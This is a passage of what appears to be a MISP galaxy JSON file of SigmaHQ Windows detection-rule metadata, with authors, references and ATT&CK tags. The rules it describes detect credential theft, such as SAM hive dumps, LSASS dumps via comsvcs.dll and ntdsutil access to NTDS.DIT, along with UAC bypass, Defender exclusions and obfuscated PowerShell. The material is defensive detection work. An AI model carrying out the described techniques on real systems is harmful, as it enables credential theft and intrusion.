"filename": "proc_creation_win_reg_enable_windows_recall.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows/client-management/mdm/policy-csp-windowsai#disableaidataanalysis", "https://learn.microsoft.com/en-us/windows/client-management/manage-recall", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_enable_windows_recall.yml" ], "tags": [ "attack.collection", "attack.t1113" ] }, "related": [ { "dest-uuid": "0259baeb-9f63-4c69-bf10-eb038c390688", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "817f252c-5143-4dae-b418-48c3e9f63728", "value": "Windows Recall Feature Enabled Via Reg.EXE" }, { "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", "meta": { "author": "Timur Zinniatullin, oscd.community", "creation_date": "2020-10-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_invoke_obfuscation_via_var.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_var.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e9f55347-2928-4c06-88e5-1a7f8169942e", "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION" }, { "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", "meta": { "author": "Ján Trenčanský", "creation_date": "2021-08-06", "falsepositive": [ "Legitimate deployment of AnyDesk" ], "filename": "proc_creation_win_remote_access_tools_anydesk_silent_install.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://support.anydesk.com/Automatic_Deployment", "https://twitter.com/TheDFIRReport/status/1423361119926816776?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_anydesk_silent_install.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", "value": "Remote Access Tool - AnyDesk Silent Installation" }, { "description": "Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS).", "meta": { "author": "Harjot Singh, '@cyb3rjy0t'", "creation_date": "2023-01-21", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_rundll32_ads_stored_dll_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Rundll32", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_ads_stored_dll_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.004" ] }, "related": [ { "dest-uuid": "f2857333-11d4-45bf-b064-2c28d8525be5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9248c7e1-2bf3-4661-a22c-600a8040b446", "value": "Potential Rundll32 Execution With DLL Stored In ADS" }, { "description": "Detects execution of LiveKD with the \"-m\" flag to potentially dump the kernel memory", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-16", "falsepositive": [ "Unlikely in production environment" ], "filename": "proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://kb.acronis.com/content/60892", "https://learn.microsoft.com/en-us/sysinternals/downloads/livekd", "https://4sysops.com/archives/creating-a-complete-memory-dump-without-a-blue-screen/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "c7746f1c-47d3-43d6-8c45-cd1e54b6b0a2", "value": "Kernel Memory Dump Via LiveKD" }, { "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-08", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ac20ae82-8758-4f38-958e-b44a3140ca88", "value": "Invoke-Obfuscation Via Use MSHTA" }, { "description": "Detects the usage of \"reg.exe\" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData.", "meta": { "author": "frack113", "creation_date": "2022-02-13", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_reg_defender_exclusion.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", "https://redcanary.com/threat-detection-report/threats/qbot/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_defender_exclusion.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "48917adc-a28e-4f5d-b729-11e75da8941f", "value": "Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE" }, { "description": "Detects uncommon child processes of \"DefaultPack.EXE\" binary as a proxy to launch other programs", "meta": { "author": "frack113", "creation_date": "2022-12-31", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_defaultpack_uncommon_child_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.echotrail.io/insights/search/defaultpack.exe", "https://lolbas-project.github.io/lolbas/OtherMSBinaries/DefaultPack/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_defaultpack_uncommon_child_process.yml" ], "tags": [ "attack.t1218", "attack.defense-evasion", "attack.execution" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b2309017-4235-44fe-b5af-b15363011957", "value": "Uncommon Child Process Of Defaultpack.EXE" }, { "description": "Detects execution of \"odbcconf\" with the \"REGSVR\" action where the DLL in question doesn't contain a \".dll\" extension. Which is often used as a method to evade defenses.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-22", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_odbcconf_register_dll_regsvr_susp.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html", "https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/", "https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_odbcconf_register_dll_regsvr_susp.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.008" ] }, "related": [ { "dest-uuid": "6e3bd510-6b33-41a4-af80-2d80f3ee0071", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ba4cfc11-d0fa-4d94-bf20-7c332c412e76", "value": "Potentially Suspicious DLL Registered Via Odbcconf.EXE" }, { "description": "Detects the execution of format.com with an uncommon filesystem selection that could indicate a defense evasion activity in which \"format.com\" is used to load malicious DLL files or other programs.\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-01-04", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_format_uncommon_filesystem_load.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1477925112561209344", "https://twitter.com/wdormann/status/1478011052130459653?s=20", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_format_uncommon_filesystem_load.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", "value": "Uncommon FileSystem Load Attempt By Format.com" }, { "description": "Detects MsiExec loading a DLL and calling its DllUnregisterServer function", "meta": { "author": "frack113", "creation_date": "2022-04-24", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_msiexec_dll.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Msiexec/", "https://twitter.com/_st0pp3r_/status/1583914515996897281", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_dll.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.007" ] }, "related": [ { "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "84f52741-8834-4a8c-a413-2eb2269aa6c8", "value": "DllUnregisterServer Function Call Via Msiexec.EXE" }, { "description": "Detects usage of the \"dir\" command part of Widows CMD with the \"/S\" command line flag in order to enumerate files in a specified directory and all subdirectories.\n", "meta": { "author": "frack113", "creation_date": "2021-12-13", "falsepositive": [ "Likely" ], "filename": "proc_creation_win_cmd_dir_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_dir_execution.yml" ], "tags": [ "attack.discovery", "attack.t1217" ] }, "related": [ { "dest-uuid": "5e4a2073-9643-44cb-a0b5-e7f4048446c7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7c9340a9-e2ee-4e43-94c5-c54ebbea1006", "value": "File And SubFolder Enumeration Via Dir Command" }, { "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", "meta": { "author": "frack113", "creation_date": "2022-09-25", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_remote_access_tools_netsupport.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_remote_access_tools_netsupport.yml" ], "tags": [ "attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "758ff488-18d5-4cbe-8ec4-02b6285a434f", "value": "Remote Access Tool - NetSupport Execution" }, { "description": "Detects the execution of WMIC with the \"format\" flag to potentially load XSL files.\nAdversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.\nExtensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files.\n", "meta": { "author": "Timur Zinniatullin, oscd.community, Swachchhanda Shrawan Poudel", "creation_date": "2019-10-21", "falsepositive": [ "WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.", "Static format arguments - https://petri.com/command-line-wmi-part-3" ], "filename": "proc_creation_win_wmic_xsl_script_processing.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_xsl_script_processing.yml" ], "tags": [ "attack.defense-evasion", "attack.t1220" ] }, "related": [ { "dest-uuid": "ebbe170d-aa74-4946-8511-9921243415a3", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "05c36dd6-79d6-4a9a-97da-3db20298ab2d", "value": "XSL Script Execution Via WMIC.EXE" }, { "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab)", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-13", "falsepositive": [ "Possible undocumented parents of \"msdt\" other than \"pcwrun\"" ], "filename": "proc_creation_win_lolbin_msdt_answer_file.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Msdt/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218", "attack.execution" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9c8c7000-3065-44a8-a555-79bcba5d9955", "value": "Execute MSDT Via Answer File" }, { "description": "Detects scheduled task creations or modification to be run with high privileges on a suspicious schedule type", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-31", "falsepositive": [ "Some installers were seen using this method of creation unfortunately. Filter them in your environment" ], "filename": "proc_creation_win_schtasks_schedule_type_system.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-change", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/schtasks-create", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_schedule_type_system.yml" ], "tags": [ "attack.execution", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7a02e22e-b885-4404-b38b-1ddc7e65258a", "value": "Suspicious Schtasks Schedule Type With High Privileges" }, { "description": "Detects the execution of \"wmic\" with the \"process\" flag, which adversary might use to list processes running on the compromised host or list installed software hotfixes and patches.", "meta": { "author": "frack113", "creation_date": "2022-01-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_recon_process.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_process.yml" ], "tags": [ "attack.execution", "attack.t1047" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "221b251a-357a-49a9-920a-271802777cc0", "value": "Process Reconnaissance Via Wmic.EXE" }, { "description": "Detects the usage of \"reg.exe\" in order to dump sensitive registry hives. This includes SAM, SYSTEM and SECURITY hives.", "meta": { "author": "Teymur Kheirkhabarov, Endgame, JHasenbusch, Daniil Yugoslavskiy, oscd.community, frack113", "creation_date": "2019-10-22", "falsepositive": [ "Dumping hives for legitimate purpouse i.e. backup or forensic investigation" ], "filename": "proc_creation_win_reg_dumping_sensitive_hives.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.wietzebeukema.nl/blog/windows-command-line-obfuscation", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-1---registry-dump-of-sam-creds-and-secrets", "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003/T1003.md", "https://eqllib.readthedocs.io/en/latest/analytics/aed95fc6-5e3f-49dc-8b35-06508613f979.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_dumping_sensitive_hives.yml" ], "tags": [ "attack.credential-access", "attack.t1003.002", "attack.t1003.004", "attack.t1003.005", "car.2013-07-001" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1ecfdab8-7d59-4c98-95d4-dc41970f57fc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "6add2ab5-2711-4e9d-87c8-7a0be8531530", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fd877b94-9bb5-4191-bb25-d79cbd93c167", "value": "Dumping of Sensitive Hives Via Reg.EXE" }, { "description": "Detects a suspicious execution of a Microsoft HTML Help (HH.exe)", "meta": { "author": "Maxim Pavlunin", "creation_date": "2020-04-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hh_susp_execution.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_susp_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.execution", "attack.initial-access", "attack.t1047", "attack.t1059.001", "attack.t1059.003", "attack.t1059.005", "attack.t1059.007", "attack.t1218", "attack.t1218.001", "attack.t1218.010", "attack.t1218.011", "attack.t1566", "attack.t1566.001" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a6937325-9321-4e2e-bb2b-3ed2d40b2a9d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b97f1d35-4249-4486-a6b5-ee60ccf24fab", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "a62a8db3-f23a-4d8f-afd6-9dbc77e7813b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "e8a95b5e-c891-46e2-b33a-93937d3abc31", "value": "Suspicious HH.EXE Execution" }, { "description": "Detects suspicious PowerShell scripts accessing SAM hives", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-07-29", "falsepositive": [ "Some rare backup scenarios", "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" ], "filename": "proc_creation_win_powershell_sam_access.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/splinter_code/status/1420546784250769408", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_sam_access.yml" ], "tags": [ "attack.credential-access", "attack.t1003.002" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1af57a4b-460a-4738-9034-db68b880c665", "value": "PowerShell SAM Copy" }, { "description": "Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT)", "meta": { "author": "Thomas Patzke", "creation_date": "2019-01-16", "falsepositive": [ "NTDS maintenance" ], "filename": "proc_creation_win_ntdsutil_usage.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntdsutil_usage.yml" ], "tags": [ "attack.credential-access", "attack.t1003.003" ] }, "related": [ { "dest-uuid": "edf91964-b26e-4b4a-9600-ccacd7d7df24", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2afafd61-6aae-4df4-baed-139fa1f4c345", "value": "Invocation of Active Directory Diagnostic Tool (ntdsutil.exe)" }, { "description": "Detects a process memory dump via \"comsvcs.dll\" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.)", "meta": { "author": "Florian Roth (Nextron Systems), Modexp, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2020-02-18", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_rundll32_process_dump_via_comsvcs.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/pythonresponder/status/1385064506049630211?s=21", "https://twitter.com/shantanukhande/status/1229348874298388484", "https://modexp.wordpress.com/2019/08/30/minidumpwritedump-via-com-services-dll/", "https://twitter.com/Hexacorn/status/1224848930795552769", "https://twitter.com/Wietze/status/1542107456507203586", "https://twitter.com/SBousseaden/status/1167417096374050817", "https://github.com/Hackndo/lsassy/blob/14d8f8ae596ecf22b449bfe919829173b8a07635/lsassy/dumpmethod/comsvcs.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml" ], "tags": [ "attack.defense-evasion", "attack.credential-access", "attack.t1036", "attack.t1003.001", "car.2013-05-009" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "646ea171-dded-4578-8a4d-65e9822892e3", "value": "Process Memory Dump Via Comsvcs.DLL" }, { "description": "BITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished.\nWhen the job runs on the system the command specified in the BITS job will be executed.\nThis can be abused by actors to create a backdoor within the system and for persistence.\nIt will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded.\n", "meta": { "author": "Sreeman", "creation_date": "2020-10-29", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_bitsadmin_potential_persistence.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://isc.sans.edu/diary/Wipe+the+drive+Stealthy+Malware+Persistence+Mechanism+-+Part+1/15394", "http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html", "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_potential_persistence.yml" ], "tags": [ "attack.defense-evasion", "attack.t1197" ] }, "related": [ { "dest-uuid": "c8e87b83-edbb-48d4-9295-4974897525b7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b9cbbc17-d00d-4e3d-a827-b06d03d2380d", "value": "Monitoring For Persistence Via BITS" }, { "description": "A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-05-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_sdclt.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/OTRF/detection-hackathon-apt29/issues/6", "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_sdclt.yml" ], "tags": [ "attack.privilege-escalation", "attack.defense-evasion", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "40f9af16-589d-4984-b78d-8c2aec023197", "value": "Potential UAC Bypass Via Sdclt.EXE" }, { "description": "Detects the execution of a renamed binary often used by attackers or malware leveraging new Sysmon OriginalFileName datapoint.", "meta": { "author": "Matthew Green @mgreen27, Ecco, James Pemberton @4A616D6573, oscd.community, Andreas Hunkeler (@Karneades)", "creation_date": "2019-06-15", "falsepositive": [ "Custom applications use renamed binaries adding slight change to binary name. Typically this is easy to spot and add to whitelist" ], "filename": "proc_creation_win_renamed_binary.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://mgreen27.github.io/posts/2019/05/29/BinaryRename2.html", "https://mgreen27.github.io/posts/2019/05/12/BinaryRename.html", "https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1036.003/T1036.003.md#atomic-test-1---masquerading-as-windows-lsass-process", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_binary.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "36480ae1-a1cb-4eaa-a0d6-29801d7e9142", "value": "Potential Defense Evasion Via Binary Rename" }, { "description": "Adversaries may attempt to get a listing of other systems by IP address, hostname, or other logical identifier on a network that may be used for Lateral Movement from the current system", "meta": { "author": "frack113", "creation_date": "2022-03-12", "falsepositive": [ "Legitimate script" ], "filename": "proc_creation_win_susp_network_scan_loop.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", "https://ss64.com/nt/for.html", "https://ss64.com/ps/foreach-object.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_scan_loop.yml" ], "tags": [ "attack.execution", "attack.t1059", "attack.discovery", "attack.t1018" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "e358d692-23c0-4a31-9eb6-ecc13a8d7735", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f8ad2e2c-40b6-4117-84d7-20b89896ab23", "value": "Suspicious Scan Loop Network" }, { "description": "Detects regsvr32 execution to download/install/register new DLLs that are hosted on Web or FTP servers.", "meta": { "author": "Florian 